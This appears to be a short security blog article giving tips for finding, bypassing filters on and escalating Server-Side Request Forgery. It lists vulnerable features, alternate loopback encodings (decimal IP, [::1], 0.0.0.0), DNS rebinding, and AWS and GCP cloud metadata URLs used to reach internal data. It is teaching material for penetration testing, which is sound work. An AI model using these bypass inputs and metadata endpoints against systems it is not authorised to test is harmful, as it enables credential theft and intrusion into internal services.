SSRF, Bypasses & Escalation Tips

Understanding Real-World SSRF Vulnerabilities (Assumes Prior Knowledge)
Caveat: This article assumes you're already familiar with Server-Side Request Forgery (SSRF). If not, check out PortSwigger's SSRF Guide first.
Server-Side Request Forgery (SSRF) is a powerful vulnerability — especially when it leads to internal service access or cloud metadata leaks. But real-world SSRF isn’t always obvious. It often hides in features that appear harmless on the surface.
Here’s a quick breakdown of commonly vulnerable features, exploitation tips, and practical advice on navigating defenses.
Common Features Vulnerable to SSRF
Look for any functionality that fetches remote resources — these often expose SSRF:
- URL import features (e.g., fetch PDF from a URL)
- File upload mechanisms (especially when the app fetches file metadata)
- Headless browsers / HTML rendering
- Server monitoring dashboards
- File storage integrations (Dropbox, Google Drive, etc.)
- Path parameters or Host headers used dynamically
- Webhooks
- Open redirect + SSRF chains
- Import/sync functionality
These are not guaranteed SSRF points, but they’re excellent places to start with.
Key Tips: Finding and Bypassing SSRF Filters
SSRF rarely works on the first try. Many apps have some basic protection. Here are some useful guidelines:
- Server vs. client: Confirm it’s the server making the request — not the browser. Use tools like Burp Collaborator to verify.
- Input filters exist: Look out for:
- IP whitelisting/blacklisting (e.g., blocking
127.0.0.1
) - Hostname filtering
- Basic WAFs
- IP whitelisting/blacklisting (e.g., blocking
- Bypass techniques:
- Use alternate IP formats (e.g.,
2130706433
for127.0.0.1
) - DNS rebinding
- Use open redirects as intermediaries
- Try
localhost
,[::1]
,0.0.0.0
, etc.
- Use alternate IP formats (e.g.,
Also note: some firewalls block requests to internal IP ranges, but misconfigured filters can often be bypassed with creative input.
Post-SSRF: Escalation & Impact
Finding SSRF is just the beginning. Your goal should always be to escalate:
- Scan internal ports: Try ports like
22
,8000
,5000
, etc. - Access cloud metadata:
- AWS:
http://169.254.169.254/latest/meta-data/
- GCP:
http://metadata.google.internal/
- AWS:
- Find admin panels:
- Common paths:
/admin
,/dashboard
,/monitor
- Internal-only UIs often listen on
localhost
or private IPs
- Common paths:
- Chain SSRF with other vulns:
- SSRF → RCE on internal apps
- SSRF → Open Redirect → Internal Access
- SSRF → Sensitive info leak (e.g., credentials, config files)
All the best, feel free to connect with me on LinkedIn.
Subscribe to my newsletter
Read articles from Dekow Mohamed directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
